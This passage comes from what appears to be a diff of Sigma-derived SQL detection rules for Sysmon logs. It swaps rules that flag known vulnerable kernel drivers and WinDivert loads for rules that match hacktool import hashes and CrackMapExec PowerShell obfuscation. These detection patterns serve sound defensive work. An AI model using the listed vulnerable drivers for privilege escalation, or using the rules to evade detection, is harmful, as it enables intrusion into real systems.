load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Legitimate use of one of these tools" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HOSTNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.collection", + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1027.005" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE 